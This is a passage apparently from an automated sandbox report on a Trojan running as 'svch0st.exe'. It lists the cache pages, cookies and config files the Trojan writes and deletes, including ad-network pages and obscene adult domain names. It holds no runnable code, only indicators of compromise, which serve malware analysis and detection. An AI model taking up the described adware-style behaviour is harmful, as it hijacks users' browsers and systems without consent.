C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_cupid.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_histories.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyiclientflash.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W16263T6.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S8WLVQD9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_statistics.sxx (0 bytes)

The process svch0st.exe:3188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\animalxxxporn_com[1].htm (9931 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7DLSY0PD.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\zooxxxfree_com[1].htm (17801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VSXW7CYA.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[5].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\marketplace.min[1].js (2162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\horse-fucking_com[1].htm (6826 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DKV2LKQG.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAPKMXHA.htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA1B6AXU.htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAQ2IP8F.htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[10].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\E4M25RIQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAWYTHJQ.htm (1598 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[11].htm (1302 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\trade[1].htm (1685 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[7].htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HLQ2ET85.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[4].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W0WR3OHC.txt (96 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCALXCOKL.htm (1319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[3].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA29BM8A.htm (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA9ZF53M.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[2].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KPIJS4AN.txt (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[3].htm (1319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NC9LUA4A.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[2].htm (1303 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[1].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\view[1].htm (773 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[1].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\13BX1ZO4.txt (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\animalpornlovers_com[1].htm (11694 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[9].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA21LIVA.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\pupfurt[1].js (3383 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[8].htm (1302 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAELQCT9.htm (1302 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[6].htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCATLST9F.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LVD54K8A.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAKIH50N.htm (1558 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\desktop.ini (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\trade[1].htm (290 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA49G7SK.htm (1318 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BMICP5BU.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA6O43T9.htm (509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\R2NAZKTU.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DIR5SLH7.txt (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2S9NB1AJ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAIOPKDC.htm (509 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7DLSY0PD.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[5].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAPKMXHA.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA1B6AXU.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAQ2IP8F.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[10].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\E4M25RIQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DKV2LKQG.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAWYTHJQ.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[11].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAIOPKDC.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[7].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HLQ2ET85.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[4].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCALXCOKL.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA29BM8A.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA9ZF53M.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NC9LUA4A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[9].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA21LIVA.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[8].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAELQCT9.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[6].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCATLST9F.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCAKIH50N.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA49G7SK.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BMICP5BU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\adsCA6O43T9.htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\R2NAZKTU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2S9NB1AJ.txt (0 bytes)

The process svch0st.exe:2632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\J89LT4OF.txt (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906144842;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\f[1].txt (107177 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\JR8GKFX8.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\index[2].htm (4357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[3].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\atwho[1].css (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KT1K30BI.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[3].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\f[1].txt (32473 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\8A4F0C723F1C[1].htm (1037 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9G85COVJ.txt (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\f[2].txt (45405 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[1].htm (1493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\js[2].js (183126 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[3].htm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\8A4F0C723F1C[1].htm (1646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads[1].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\jquery.qtip[1].css (5095 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\js[1].js (53658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906161765;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\zenicon[1].eot (32766 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\f[1].txt (44885 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[4].htm (747 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\quant[1].js (5334 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\bnr[1].htm (178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1THAFJKQ.txt (407 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\slide[1].css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BD5T0HI7.txt (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\com.talker.class[1].js (650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[1].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\bnr[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\OZDIKCNB\coinsns[1].xml (595 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[2].htm (1492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\geetest.5.10.0[1].js (16175 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[2].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\8A4F0C723F1C[1].htm (2336 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\index[1].htm (9288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\slide[1].css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ca-pub-5722932343401905[1].js (68 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\magnific-popup[1].css (3573 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5FM6I276.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[1].htm (2984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[2].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[1].htm (2984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads[2].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\WRQMQYSP.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[1].htm (1493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\index[1].htm (8716 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5D0QW9Y1.txt (407 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\check[1].css (921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[4].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[2].htm (1492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\lottery[1].css (11456 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\style.3.2.0[1].css (5024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[5].htm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\H49OIM3X.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\script.packed[1].js (24186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[5].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\js[3].js (432 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[3].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906118834;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\zui[1].css (84707 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KZ8SJFUR.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\core[1].css (25346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\radialIndicator.min[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\c=n;dst=1;et=1484906135298;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\zrt_lookup[1].htm (5608 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EY6YFA77.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\analytics[1].js (14647 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[2].htm (1492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[4].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[5].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\geetest.0.0.0[1].js (16202 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads[2].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[4].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\jquery.iframe-transport[1].js (1298 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DJIU3XS6.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\lazyload[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\c=n;dst=1;et=1484906153069;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[1].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[3].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\size1[1].css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\zui-theme[1].css (2422 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KZ8SJFUR.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\J89LT4OF.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906161765;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\c=n;dst=1;et=1484906135298;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (0 bytes)
